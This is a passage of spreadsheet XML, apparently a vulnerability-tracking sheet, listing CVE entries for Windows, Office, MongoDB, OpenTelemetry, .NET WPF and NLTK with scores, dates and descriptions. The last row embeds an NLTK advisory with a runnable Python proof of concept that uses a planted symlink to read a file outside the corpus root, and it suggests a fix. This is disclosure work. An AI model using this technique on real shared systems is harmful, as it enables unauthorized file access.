      <c r="E1018" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1018" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1018" s="5" t="inlineStr"/>
      <c r="H1018" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1018" s="5" t="inlineStr"/>
      <c r="J1018" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1018" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1018" s="5" t="inlineStr"/>
      <c r="M1018" s="5" t="inlineStr"/>
      <c r="N1018" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1018" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q1018" s="5" t="inlineStr"/>
      <c r="R1018" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1018" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Security Health Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1018" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78457</t>
        </is>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1019" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1019" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78464</t>
        </is>
      </c>
      <c r="D1019" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1019" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1019" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1019" s="5" t="inlineStr"/>
      <c r="H1019" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1019" s="5" t="inlineStr"/>
      <c r="J1019" s="5" t="inlineStr"/>
      <c r="K1019" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L1019" s="5" t="inlineStr"/>
      <c r="M1019" s="5" t="inlineStr"/>
      <c r="N1019" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1019" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1019" s="5" t="inlineStr"/>
      <c r="R1019" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S1019" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T1019" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78464</t>
        </is>
      </c>
    </row>
    <row r="1020">
      <c r="A1020" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1020" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1020" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80093</t>
        </is>
      </c>
      <c r="D1020" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1020" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1020" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1020" s="5" t="inlineStr"/>
      <c r="H1020" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1020" s="5" t="inlineStr"/>
      <c r="J1020" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K102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020" s="5" t="inlineStr"/>
      <c r="M1020" s="5" t="inlineStr"/>
      <c r="N1020" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1020" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1020" s="5" t="inlineStr"/>
      <c r="R1020" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1020" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Cloud Files Mini Filter Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1020" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80093</t>
        </is>
      </c>
    </row>
    <row r="1021">
      <c r="A1021" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1021" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1021" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81192</t>
        </is>
      </c>
      <c r="D1021" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1021" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1021" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1021" s="5" t="inlineStr"/>
      <c r="H1021" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1021" s="5" t="inlineStr"/>
      <c r="J1021" s="5" t="inlineStr"/>
      <c r="K1021" s="5" t="inlineStr"/>
      <c r="L1021" s="5" t="inlineStr"/>
      <c r="M1021" s="5" t="inlineStr"/>
      <c r="N1021" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1021" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1021" s="5" t="inlineStr"/>
      <c r="R1021" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="S1021" s="5" t="inlineStr">
        <is>
          <t>`OpenTelemetry.Resources.Host` NuGet package, which provides OpenTelemetry resource detectors for host, is affected by an untrusted search path vulnerability on macOS. Prior to version 1.16.0-beta.2, the `host.id` resource attribute detector launches the `sh` and `ioreg` executables by bare name rather than by absolute path, so both are resolved through the `PATH` environment variable. A local attacker who is less privileged than the host application, and who can influence `PATH` or write to a directory that appears in `PATH` ahead of the system directories, can have an arbitrary binary executed in the application's security context, resulting in local code execution/privilege escalation. This vulnerability only affect macOS hosts - Linux and Windows hosts are unaffected. Version 1.16.0-beta.2 contains a patch. No known workarounds are available.</t>
        </is>
      </c>
      <c r="T1021" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81192</t>
        </is>
      </c>
    </row>
    <row r="1022">
      <c r="A1022" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1022" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1022" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81389</t>
        </is>
      </c>
      <c r="D1022" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1022" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1022" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1022" s="5" t="inlineStr"/>
      <c r="H1022" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1022" s="5" t="inlineStr"/>
      <c r="J1022" s="5" t="inlineStr"/>
      <c r="K1022" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L1022" s="5" t="inlineStr"/>
      <c r="M1022" s="5" t="inlineStr"/>
      <c r="N1022" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1022" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1022" s="5" t="inlineStr"/>
      <c r="R1022" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S1022" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="T1022" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81389</t>
        </is>
      </c>
    </row>
    <row r="1023">
      <c r="A1023" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1023" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1023" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82062</t>
        </is>
      </c>
      <c r="D1023" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1023" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1023" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G1023" s="5" t="inlineStr"/>
      <c r="H1023" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1023" s="5" t="inlineStr"/>
      <c r="J1023" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K1023" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L1023" s="5" t="inlineStr"/>
      <c r="M1023" s="5" t="inlineStr"/>
      <c r="N1023" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1023" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q1023" s="5" t="inlineStr"/>
      <c r="R1023" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S1023" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1023" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82062</t>
        </is>
      </c>
    </row>
    <row r="1024">
      <c r="A1024" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1024" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1024" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83940</t>
        </is>
      </c>
      <c r="D1024" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1024" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1024" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1024" s="5" t="inlineStr"/>
      <c r="H1024" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1024" s="5" t="inlineStr"/>
      <c r="J1024" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K102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024" s="5" t="inlineStr"/>
      <c r="M1024" s="5" t="inlineStr"/>
      <c r="N1024" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1024" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1024" s="5" t="inlineStr"/>
      <c r="R1024" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1024" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1024" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83940</t>
        </is>
      </c>
    </row>
    <row r="1025">
      <c r="A1025" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1025" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1025" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83999</t>
        </is>
      </c>
      <c r="D1025" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1025" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1025" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1025" s="5" t="inlineStr"/>
      <c r="H1025" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1025" s="5" t="inlineStr"/>
      <c r="J1025" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1025" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L1025" s="5" t="inlineStr"/>
      <c r="M1025" s="5" t="inlineStr"/>
      <c r="N1025" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1025" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q1025" s="5" t="inlineStr"/>
      <c r="R1025" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S1025" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Resilient File System (ReFS) Deduplication Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1025" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83999</t>
        </is>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1026" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1026" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85360</t>
        </is>
      </c>
      <c r="D1026" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1026" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1026" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G1026" s="5" t="inlineStr"/>
      <c r="H1026" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1026" s="5" t="inlineStr"/>
      <c r="J1026" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K102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26" s="5" t="inlineStr"/>
      <c r="M1026" s="5" t="inlineStr"/>
      <c r="N1026" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1026" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q1026" s="5" t="inlineStr"/>
      <c r="R1026" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S1026" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T1026" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85360</t>
        </is>
      </c>
    </row>
    <row r="1027">
      <c r="A1027" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1027" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1027" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86135</t>
        </is>
      </c>
      <c r="D1027" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E1027" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1027" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G1027" s="5" t="inlineStr"/>
      <c r="H1027" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1027" s="5" t="inlineStr"/>
      <c r="J1027" s="5" t="inlineStr"/>
      <c r="K1027" s="5" t="inlineStr"/>
      <c r="L1027" s="5" t="inlineStr"/>
      <c r="M1027" s="5" t="inlineStr"/>
      <c r="N1027" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1027" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1027" s="5" t="inlineStr"/>
      <c r="R1027" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-400</t>
        </is>
      </c>
      <c r="S1027" s="5" t="inlineStr">
        <is>
          <t>A Cross-Site Request Forgery (CSRF) vulnerability in WatchGuard Dimension's database snapshot creation feature allows a remote attacker to trigger unauthorized snapshot creation by tricking an authenticated administrator into visiting a specially crafted web page.</t>
        </is>
      </c>
      <c r="T1027" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86135</t>
        </is>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1028" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1028" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50646</t>
        </is>
      </c>
      <c r="D1028" s="5" t="inlineStr"/>
      <c r="E1028" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1028" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1028" s="5" t="inlineStr"/>
      <c r="H1028" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I1028" s="5" t="inlineStr"/>
      <c r="J1028" s="5" t="inlineStr"/>
      <c r="K1028" s="5" t="inlineStr"/>
      <c r="L1028" s="5" t="inlineStr">
        <is>
          <t>NuGet:Microsoft.WindowsDesktop.App.Runtime.win-arm64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x64, NuGet:Microsoft.WindowsDesktop.App.Runtime.win-x86</t>
        </is>
      </c>
      <c r="M1028" s="5" t="inlineStr">
        <is>
          <t>10.0.10, 8.0.29, 9.0.18</t>
        </is>
      </c>
      <c r="N1028" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1028" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1028" s="5" t="inlineStr"/>
      <c r="R1028" s="5" t="inlineStr"/>
      <c r="S1028" s="5" t="inlineStr">
        <is>
          <t>## Executive summary
Microsoft is releasing this security advisory to provide information about a vulnerability in Windows Presentation Foundation (WPF). This advisory also provides guidance on what developers can do to update their applications to remove this vulnerability.
A remote code execution vulnerability exists in Windows Presentation Foundation (WPF) in .NET 8, .NET 9, and .NET 10 when parsing specially crafted XAML input. An attacker who successfully exploits this vulnerability could execute arbitrary code in the context of the current user.
## Announcement
Announcement for this issue can be found at https://github.com/dotnet/announcements/issues/**TBD**
## CVSS Details
- **Version:** 3.1
- **Severity:** High
- **Score:** 7.8
- **Vector:** `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`
- **Weakness:** CWE-693 (Protection Mechanism Failure)
## Affected Platforms
- **Platforms:** Windows
- **Architectures:** All
## &lt;a name="affected-packages"&gt;&lt;/a&gt;Affected Packages
The vulnerability affects any Microsoft .NET project if it uses any of affected package versions listed below
### &lt;a name=".NET 10.0"&gt;&lt;/a&gt;.NET 10.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 10.0.0, &lt;= 10.0.9 | 10.0.10
### &lt;a name=".NET 9.0"&gt;&lt;/a&gt;.NET 9.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 9.0.0, &lt;= 9.0.17 | 9.0.18
### &lt;a name=".NET 8.0"&gt;&lt;/a&gt;.NET 8.0
Package name | Affected version | Patched version
------------ | ---------------- | -------------------------
[Microsoft.WindowsDesktop.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-arm64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x64)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
[Microsoft.WindowsDesktop.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.WindowsDesktop.App.Runtime.win-x86)               | &gt;= 8.0.0, &lt;= 8.0.28 | 8.0.29
## Advisory FAQ
### &lt;a name="how-affected"&gt;&lt;/a&gt;How do I know if I am affected?
If using a package listed in [affected packages](#affected-packages), developers exposed to the vulnerability.
### &lt;a name="how-fix"&gt;&lt;/a&gt;How do I fix the issue?
1. To fix the issue please install the latest version of .NET. If developers have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt them to update Visual Studio, which will also update their .NET SDKs.
2. If their application references the vulnerable nuget package, update the package reference to the patched version. Developers can list the versions they have installed by running the `dotnet --info` command.
Once developers have installed the updated runtime or SDK, they should restart their apps for the update to take effect.
Additionally, if they've deployed [self-contained applications](https://docs.microsoft.com/dotnet/core/deploying/#self-contained-deployments-scd) targeting any of the impacted versions, these applications are also vulnerable and must be recompiled and redeployed.
## Other Information
### Reporting Security Issues
If anyone has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Direct questions about this issue to GitHub in the .NET GitHub organization. The main repos are located at https://github.com/dotnet/runtime. The Announcements repo (https://github.com/dotnet/Announcements) will contain this bulletin as an issue and will include a link to a discussion issue. Users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[CVE-2026-50646]( https://www.cve.org/CVERecord?id=CVE-2026-50646)
### Acknowledgements
Kevin Gosse, 41ae55e9310ff27fa6f26af4727e5590, Ky0toFu
### Revisions
V1.0 (July 14, 2026): Advisory published.</t>
        </is>
      </c>
      <c r="T1028" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50646</t>
        </is>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1029" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1029" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62384</t>
        </is>
      </c>
      <c r="D1029" s="5" t="inlineStr"/>
      <c r="E1029" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1029" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1029" s="5" t="inlineStr"/>
      <c r="H1029" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I1029" s="5" t="inlineStr"/>
      <c r="J1029" s="5" t="inlineStr"/>
      <c r="K1029" s="5" t="inlineStr"/>
      <c r="L1029" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1029" s="5" t="inlineStr">
        <is>
          <t>3.10.2</t>
        </is>
      </c>
      <c r="N1029" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1029" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1029" s="5" t="inlineStr"/>
      <c r="R1029" s="5" t="inlineStr"/>
      <c r="S1029" s="5" t="inlineStr">
        <is>
          <t>This is a **new, distinct vulnerability**: a bypass of the fix already published as [GHSA-xh95-f55m-82fw](https://github.com/nltk/nltk/security/advisories/GHSA-xh95-f55m-82fw) ("Path traversal in NLTK FramenetCorpusReader.frame() allows arbitrary XML file read, bypassing the nltk.pathsec sandbox"), not a duplicate of it.
## Summary
The original advisory was fixed (PR [#3581](https://github.com/nltk/nltk/pull/3581)) by adding `_reject_unsafe_path_component()`, which blocks literal `/`, `\`, `..`, and Windows drive prefixes in caller-/corpus-supplied names. It never resolves symlinks. All three call sites that use this guard still resolve the resulting path through `self.abspath()` (`nltk/corpus/reader/api.py`, `self._root.join(fileid)`), which is a plain lexical join, not the symlink-resolving, `required_root`-scoped check that `CorpusReader.open()` (and `NKJPCorpusReader`'s own fix for its sibling advisory) correctly use elsewhere in this same codebase.
A symlink placed inside the corpus's own subdirectory, with a name containing no separators at all, passes the guard cleanly and reads a file completely outside the corpus root.
## Affected code (`nltk/corpus/reader/framenet.py`)
- `frame_by_name()` reads `&lt;frame_dir&gt;/&lt;name&gt;.xml`
- `_lu_file()` reads `&lt;lu_dir&gt;/lu&lt;id&gt;.xml`
- `doc()` reads `&lt;fulltext_dir&gt;/&lt;filename&gt;`
All three follow the same chain: `_reject_unsafe_path_component(value, ...)`, then `self.abspath(os.path.join(subdir, value))`, then `XMLCorpusView(...)`, opened via `PathPointer.open()` with no `required_root`.
## Proof of concept
Self-contained, runnable end to end.
```python
import os
import tempfile
from nltk.corpus.reader.framenet import FramenetCorpusReader
root = tempfile.mkdtemp()
corpus_root = os.path.join(root, "framenet_v17")
frame_dir = os.path.join(corpus_root, "frame")
secret_dir = os.path.join(root, "outside_framenet_root")
os.makedirs(frame_dir)
os.makedirs(secret_dir)
with open(os.path.join(corpus_root, "frRelation.xml"), "w") as f:
    f.write("&lt;frameRelations/&gt;")
secret_path = os.path.join(secret_dir, "stolen.xml")
with open(secret_path, "w") as f:
    f.write(
        '&lt;frame cBy="000" cDate="01/01/2000" name="StolenFrame" ID="999999"&gt;'
        "&lt;definition&gt;THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT&lt;/definition&gt;"
        "&lt;/frame&gt;"
    )
# Attacker plants this inside &lt;corpus_root&gt;/frame/. No path separators,
# so it passes _reject_unsafe_path_component cleanly.
link_path = os.path.join(frame_dir, "evil_link.xml")
os.symlink(secret_path, link_path)
reader = FramenetCorpusReader(corpus_root, [])
reader._frame_idx = {"__dummy__": {"name": "__dummy__"}}  # skip unrelated index build
result = reader.frame_by_name("evil_link")   # normal, routine call, no ".." anywhere
print("frame name:", result["name"])
print("definition:", result["definition"])
```
Actual output when run against unpatched `main` (commit `35813c8`):
```
frame name: StolenFrame
definition: THIS CAME FROM OUTSIDE THE FRAMENET CORPUS ROOT
```
That content was read from `secret_path`, a file entirely outside `corpus_root`, via a single, unmodified, public API call. No exception is raised anywhere in the chain; `_reject_unsafe_path_component` passes because `"evil_link"` contains no separators, `..`, or drive prefix.
Verified the same way for the other two affected call sites, `_lu_file()` (`lu&lt;id&gt;.xml` symlink under `lu/`) and `doc()` (arbitrary filename symlink under `fulltext/`), both succeeding identically with no exception raised.
## Why this is in scope
- No malicious file for a victim to open, no special user interaction. Just a tampered/shared corpus directory (NLTK's own `SECURITY.md` names "shared environments... multi-tenant pipelines" as its threat model) plus a completely normal API call.
- Core corpus-reader code, not a demo/GUI tool.
- Confirmed unintentional: PR #3581's own description states the goal was to route through "the `nltk.pathsec` sandbox... including the strict `ENFORCE=True` mode" and be "consistent with the validation already used elsewhere in NLTK." It doesn't achieve that, since `abspath()` never reaches the scoped, symlink-resolving check that exists and is used correctly elsewhere in the same file tree (`NKJPCorpusReader`).
## Suggested fix
Route all three call sites through `CorpusReader.open()` (or pass `required_root=self._root` to `validate_path()` directly, as `NKJPCorpusReader` already does), instead of `self.abspath()` plus raw `PathPointer.open()`.</t>
        </is>
      </c>
      <c r="T1029" s="6" t="inlineStr">
        <is>
